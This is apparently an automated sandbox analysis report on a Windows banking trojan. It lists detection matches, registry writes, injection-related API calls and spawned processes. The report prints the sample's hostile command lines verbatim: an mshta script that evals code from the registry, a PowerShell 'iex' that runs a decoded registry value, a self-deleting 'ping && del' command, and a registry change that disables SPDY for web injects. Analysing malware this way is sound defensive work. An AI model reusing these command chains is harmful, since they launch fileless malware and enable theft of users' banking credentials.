Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4AFC0 0_2_03C4AFC0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C47FBE 0_2_03C47FBE
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4836E 0_2_03C4836E
Source: C:\Windows\System32\control.exe Code function: 21_2_00A559E4 21_2_00A559E4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A57548 21_2_00A57548
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3C3E4 21_2_00A3C3E4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A39098 21_2_00A39098
Source: C:\Windows\System32\control.exe Code function: 21_2_00A35420 21_2_00A35420
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4C400 21_2_00A4C400
Source: C:\Windows\System32\control.exe Code function: 21_2_00A44818 21_2_00A44818
Source: C:\Windows\System32\control.exe Code function: 21_2_00A50468 21_2_00A50468
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3847C 21_2_00A3847C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A41C44 21_2_00A41C44
Source: C:\Windows\System32\control.exe Code function: 21_2_00A58448 21_2_00A58448
Source: C:\Windows\System32\control.exe Code function: 21_2_00A365A8 21_2_00A365A8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A329B0 21_2_00A329B0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A591B0 21_2_00A591B0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4CDC4 21_2_00A4CDC4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A40DC8 21_2_00A40DC8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4B1D0 21_2_00A4B1D0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4993C 21_2_00A4993C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A53D68 21_2_00A53D68
Source: C:\Windows\System32\control.exe Code function: 21_2_00A48974 21_2_00A48974
Source: C:\Windows\System32\control.exe Code function: 21_2_00A59AA8 21_2_00A59AA8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A45AB4 21_2_00A45AB4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3AAB4 21_2_00A3AAB4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A42A90 21_2_00A42A90
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4DEE8 21_2_00A4DEE8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A452D0 21_2_00A452D0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A31638 21_2_00A31638
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4220C 21_2_00A4220C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A35A1C 21_2_00A35A1C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A477A0 21_2_00A477A0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3CFF8 21_2_00A3CFF8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A39FC4 21_2_00A39FC4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A33764 21_2_00A33764
Source: C:\Windows\System32\control.exe Code function: 21_2_00A5137C 21_2_00A5137C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A51B4C 21_2_00A51B4C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D27548 31_2_000001B888D27548
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D259E4 31_2_000001B888D259E4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D2137C 31_2_000001B888D2137C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D177A0 31_2_000001B888D177A0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D21B4C 31_2_000001B888D21B4C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D03764 31_2_000001B888D03764
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D152D0 31_2_000001B888D152D0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1DEE8 31_2_000001B888D1DEE8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0847C 31_2_000001B888D0847C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D09098 31_2_000001B888D09098
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D28448 31_2_000001B888D28448
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D11C44 31_2_000001B888D11C44
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D20468 31_2_000001B888D20468
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0CFF8 31_2_000001B888D0CFF8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1C400 31_2_000001B888D1C400
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D14818 31_2_000001B888D14818
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D05420 31_2_000001B888D05420
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D09FC4 31_2_000001B888D09FC4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0C3E4 31_2_000001B888D0C3E4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D065A8 31_2_000001B888D065A8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D029B0 31_2_000001B888D029B0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D291B0 31_2_000001B888D291B0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1993C 31_2_000001B888D1993C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D23D68 31_2_000001B888D23D68
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D18974 31_2_000001B888D18974
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D12A90 31_2_000001B888D12A90
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D29AA8 31_2_000001B888D29AA8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0AAB4 31_2_000001B888D0AAB4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D15AB4 31_2_000001B888D15AB4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D01638 31_2_000001B888D01638
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1220C 31_2_000001B888D1220C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D05A1C 31_2_000001B888D05A1C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D10DC8 31_2_000001B888D10DC8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1B1D0 31_2_000001B888D1B1D0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1CDC4 31_2_000001B888D1CDC4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D3B5A4 31_2_000001B888D3B5A4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_037413FA 44_2_037413FA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374B006 44_2_0374B006
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
PE file contains strange resources
Source: FpYf5EGDO9.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FpYf5EGDO9.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Uses 32bit PE files
Source: FpYf5EGDO9.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401703 NtMapViewOfSection, 0_2_00401703
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset, 0_2_00401C90
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019A0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C45CD1 GetProcAddress,NtCreateSection,memset, 0_2_03C45CD1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C49E79 NtMapViewOfSection, 0_2_03C49E79
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_03C49A0F
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4B1E5 NtQueryVirtualMemory, 0_2_03C4B1E5
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4B080 NtMapViewOfSection, 21_2_00A4B080
Source: C:\Windows\System32\control.exe Code function: 21_2_00A474E0 RtlAllocateHeap,NtQueryInformationProcess, 21_2_00A474E0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A570F8 NtCreateSection, 21_2_00A570F8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A48078 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 21_2_00A48078
Source: C:\Windows\System32\control.exe Code function: 21_2_00A48844 NtWriteVirtualMemory, 21_2_00A48844
Source: C:\Windows\System32\control.exe Code function: 21_2_00A43104 NtAllocateVirtualMemory, 21_2_00A43104
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4B164 NtQueryInformationProcess, 21_2_00A4B164
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3B964 NtReadVirtualMemory, 21_2_00A3B964
Source: C:\Windows\System32\control.exe Code function: 21_2_00A54200 NtQueryInformationToken,NtQueryInformationToken,NtClose, 21_2_00A54200
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3C3E4 NtSetContextThread,NtUnmapViewOfSection,NtClose, 21_2_00A3C3E4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A6B00B NtProtectVirtualMemory,NtProtectVirtualMemory, 21_2_00A6B00B
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1B164 NtQueryInformationProcess, 31_2_000001B888D1B164
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D24200 NtQueryInformationToken,NtQueryInformationToken,NtClose, 31_2_000001B888D24200
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D3B00B NtProtectVirtualMemory,NtProtectVirtualMemory, 31_2_000001B888D3B00B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_037407E8 NtQueryInformationProcess, 44_2_037407E8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373B347 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 44_2_0373B347
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374FBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 44_2_0374FBD1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373A63D memset,NtQueryInformationProcess, 44_2_0373A63D
Sample file is different than original file name gathered from version info
Source: FpYf5EGDO9.exe, 00000000.00000003.457741081.0000000005EC4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FpYf5EGDO9.exe
Source: FpYf5EGDO9.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211123 Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@33/20@11/7
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: FpYf5EGDO9.exe Virustotal: Detection: 46%
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FpYf5EGDO9.exe "C:\Users\user\Desktop\FpYf5EGDO9.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3sr4b0q.5pk.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_03C48F1B
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{CC8B2523-BB54-DEC2-A5C0-1FF2A9F4C346}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{149D3F5E-63E5-660B-8D88-47FA113C6BCE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{ECAECFE4-5BDD-FE72-45E0-BF1249146366}
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{7CCD0A5F-ABCA-0E60-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: pemahu 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: Regefiri 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: Xegixaze 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: \H 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: zijiwe 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: "Y? 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: mecevituxe 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: FpYf5EGDO9.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
